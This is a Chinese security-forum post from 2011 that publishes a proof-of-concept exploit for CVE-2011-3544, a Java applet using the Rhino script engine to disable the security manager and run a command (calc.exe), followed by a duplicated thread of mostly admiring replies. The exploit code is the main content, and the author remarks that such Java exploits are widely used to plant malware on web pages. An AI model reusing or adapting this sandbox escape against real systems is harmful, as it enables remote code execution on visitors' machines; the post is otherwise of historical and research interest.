[原创] 新鲜出炉 - CVE-2011-3544 POC-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创] 新鲜出炉 - CVE-2011-3544 POC

发表于: 2011-11-30 14:45 10676

[原创] 新鲜出炉 - CVE-2011-3544 POC

古河

2011-11-30 14:45

10676

import java.applet.Applet;
 
import javax.script.*;
 
import javax.swing.JList;
 
public class ScriptEngineExp extends Applet {
 
    private JList list;
     
    public void init() {
 
        try {
 
            ScriptEngine se = new ScriptEngineManager().getEngineByName("js");
             
            se.eval("var error = new Error(\"My error\");" +
                    "this.toString = function(){ " +
                    "java.lang.System.setSecurityManager(null);" +
                    "java.lang.Runtime.getRuntime().exec(\"calc.exe\");" +
                    "return \"exploit!\";};" +
                    "error.message = this;");
         
            list = new JList(new Object[]{se.get("error")});
             
            this.add(list);
 
        } catch (ScriptException ex) {
 
            ex.printStackTrace();
 
        }
 
    }
 
}

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・8

免费・7

支持

赞赏记录

参与人

雪币

留言

时间

嫉妒的死远点

为你点赞~

2024-5-31 06:35

伟叔叔

为你点赞~

2024-5-31 03:07

心游尘世外

为你点赞~

2024-3-18 03:58

飘零丶

为你点赞~

2024-3-10 00:35

QinBeast

为你点赞~

2024-2-15 00:05

shinratensei

为你点赞~

2024-1-25 04:40

PLEBFE

为你点赞~

2023-3-7 00:48

最新回复 (13)
Fido 雪币： 107 活跃值： (424) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 2 关注私信	Fido 2 楼太强大了啊...............学习了.. 2011-11-30 16:54 0
jerrynpc 雪币： 284 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 695 粉丝 0 关注私信	jerrynpc 3 楼膜拜古河大神 2011-11-30 17:58 0
instruder 雪币： 146 活跃值： (182) 能力值： ( LV13，RANK：220 ) 在线值：发帖 37 回帖 438 粉丝 5 关注私信	instruder 4 4 楼貌似java从来就没有更新成功过...... 2011-11-30 18:44 0
古河雪币： 822 活跃值： (380) 能力值： ( LV12，RANK：310 ) 在线值：发帖 24 回帖 132 粉丝 36 关注私信	古河 6 5 楼其实Java Exploit危害还是很大的，毕竟装机量大特别是像这种类型的exploit，直接绕过沙盒，又不需要溢出或攻击内存错误，直接无视DEP+ASLR 最近这一年用Java Exploit挂马呈明显上升趋势 2011-11-30 19:06 0
gwJiang 雪币： 55 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 36 粉丝 0 关注私信	gwJiang 6 楼人家是german，你懂的 2011-11-30 22:28 0
邓韬雪币： 278 活跃值： (709) 能力值： ( LV15，RANK：520 ) 在线值：发帖 265 回帖 1670 粉丝 1 关注私信	邓韬 9 7 楼不懂，膜拜楼上各位大侠！ 2011-11-30 22:34 0
zuoyefeng 雪币： 237 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 124 粉丝 0 关注私信	zuoyefeng 8 楼啊啊啊啊啊啊~~~~ 还是有人注意到了还是有人爆了 2011-11-30 22:44 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 7 关注私信	KiDebug 4 9 楼古河样样精通啊！膜拜ing.... 2011-11-30 23:40 0
weizi 雪币： 22 活跃值： (1043) 能力值： ( LV5，RANK：60 ) 在线值：发帖 11 回帖 308 粉丝 12 关注私信	weizi 1 10 楼 msf已经有了，java rhino。试了一下，在xp下java 1.6.26下是可以拿到权限的。 2011-12-1 21:49 0
wingdbg 雪币： 393 活跃值： (150) 能力值： (RANK：110 ) 在线值：发帖 10 回帖 153 粉丝 9 关注私信	wingdbg 2 11 楼这个POC该怎么测试？ 2011-12-1 22:06 0
沙滩鱼雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	沙滩鱼 12 楼膜拜大神 2011-12-2 09:19 0
OnlyLoveMM 雪币： 51 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 73 粉丝 0 关注私信	OnlyLoveMM 13 楼是啊，我也膜拜。 2011-12-6 09:42 0
dabaosod 雪币：活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	dabaosod 14 楼膜拜古河大神神帖！ 2011-12-21 09:00 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

古河

发帖

132

回帖

310

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (13)
Fido 雪币： 107 活跃值： (424) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 2 关注私信	Fido 2 楼太强大了啊...............学习了.. 2011-11-30 16:54 0
jerrynpc 雪币： 284 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 695 粉丝 0 关注私信	jerrynpc 3 楼膜拜古河大神 2011-11-30 17:58 0
instruder 雪币： 146 活跃值： (182) 能力值： ( LV13，RANK：220 ) 在线值：发帖 37 回帖 438 粉丝 5 关注私信	instruder 4 4 楼貌似java从来就没有更新成功过...... 2011-11-30 18:44 0
古河雪币： 822 活跃值： (380) 能力值： ( LV12，RANK：310 ) 在线值：发帖 24 回帖 132 粉丝 36 关注私信	古河 6 5 楼其实Java Exploit危害还是很大的，毕竟装机量大特别是像这种类型的exploit，直接绕过沙盒，又不需要溢出或攻击内存错误，直接无视DEP+ASLR 最近这一年用Java Exploit挂马呈明显上升趋势 2011-11-30 19:06 0
gwJiang 雪币： 55 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 36 粉丝 0 关注私信	gwJiang 6 楼人家是german，你懂的 2011-11-30 22:28 0
邓韬雪币： 278 活跃值： (709) 能力值： ( LV15，RANK：520 ) 在线值：发帖 265 回帖 1670 粉丝 1 关注私信	邓韬 9 7 楼不懂，膜拜楼上各位大侠！ 2011-11-30 22:34 0
zuoyefeng 雪币： 237 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 124 粉丝 0 关注私信	zuoyefeng 8 楼啊啊啊啊啊啊~~~~ 还是有人注意到了还是有人爆了 2011-11-30 22:44 0
KiDebug 雪币： 544 活跃值： (264) 能力值： ( LV12，RANK：210 ) 在线值：发帖 20 回帖 280 粉丝 7 关注私信	KiDebug 4 9 楼古河样样精通啊！膜拜ing.... 2011-11-30 23:40 0
weizi 雪币： 22 活跃值： (1043) 能力值： ( LV5，RANK：60 ) 在线值：发帖 11 回帖 308 粉丝 12 关注私信	weizi 1 10 楼 msf已经有了，java rhino。试了一下，在xp下java 1.6.26下是可以拿到权限的。 2011-12-1 21:49 0
wingdbg 雪币： 393 活跃值： (150) 能力值： (RANK：110 ) 在线值：发帖 10 回帖 153 粉丝 9 关注私信	wingdbg 2 11 楼这个POC该怎么测试？ 2011-12-1 22:06 0
沙滩鱼雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	沙滩鱼 12 楼膜拜大神 2011-12-2 09:19 0
OnlyLoveMM 雪币： 51 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 73 粉丝 0 关注私信	OnlyLoveMM 13 楼是啊，我也膜拜。 2011-12-6 09:42 0
dabaosod 雪币：活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	dabaosod 14 楼膜拜古河大神神帖！ 2011-12-21 09:00 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创] 新鲜出炉 - CVE-2011-3544 POC

账号登录 验证码登录

账号登录

验证码登录